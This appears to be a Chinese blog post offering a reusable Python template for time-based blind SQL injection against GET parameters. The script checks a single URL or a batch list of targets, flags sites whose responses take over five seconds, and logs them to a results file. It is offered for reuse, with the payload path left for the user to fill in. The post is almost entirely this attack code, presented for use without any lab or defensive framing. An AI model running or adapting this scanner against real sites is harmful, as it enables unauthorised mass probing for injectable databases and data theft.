«

Sql延时注入Get型模版,代码简单,可套用

站长 • 2024-02-29 11:21 • 174 次点击 • 技术文章


import requests
import argparse
from datetime import datetime
import time
import re
requests.packages.urllib3.disable_warnings()

RED_BOLD = "\033[1;31m"
RESET = "\033[0m"
def usage():
    global RED_BOLD
    global RESET
    text = '''

    这都看不懂去找giao给你补个蛋

    使用方法:
        单个 python3 Sqli.py -u url[例 http://127.0.0.1:8080]
        批量 python3 Sqli.py -f filename

    开始检测................................
    '''
    print(f"{RED_BOLD}{text}{RESET}")

# proxies = {'http':'http://127.0.0.1:10808}

def save_file(url):
    with open('result.txt',mode='a',encoding='utf-8') as f:
        f.write(url+'\n')

def poc(check_url,flag):
    now_poc = datetime.now()
    global RED_BOLD
    global RESET
    url = check_url + "" # 引号里面补充路径
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9'
    }

    try:
        # 切记修改对应的延时时间
        response = requests.get(url, headers=headers,timeout=5,verify=False)
        if response.status_code == 200 and response.elapsed.total_seconds() > 5.0 :
            print(f'{RED_BOLD}[+]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t我淦!出货了!{RESET}')
            print(url)
            save_file(url)

        else:
            print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t绰!没洞')

    except Exception as e:
        print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t无法访问,请检查目标站点是否存在')

def run(filepath):
    flag = 0
    urls = [x.strip() for x in open(filepath, "r").readlines()]
    for u in urls:
        if 'http' in u:
            url = u
        elif 'https' in u:
            url = u
        else:
            url = 'http://' + u

        poc(url,flag)

def main():
    parse = argparse.ArgumentParser()
    parse.add_argument("-u", "--url", help="Sqli.py -u url")
    parse.add_argument("-f", "--file", help="Sqli.py -f file")
    args = parse.parse_args()
    url = args.url
    filepath = args.file
    usage()
    time.sleep(1)
    if url is not None and filepath is None:
        flag = 1
        poc(url,flag)
    elif url is None and filepath is not None:
        run(filepath)
    else:
        usage()

if __name__ == '__main__':
    main()

推荐阅读:


扫描二维码,在手机上阅读
收藏
还没收到回复
请先 登录 再回复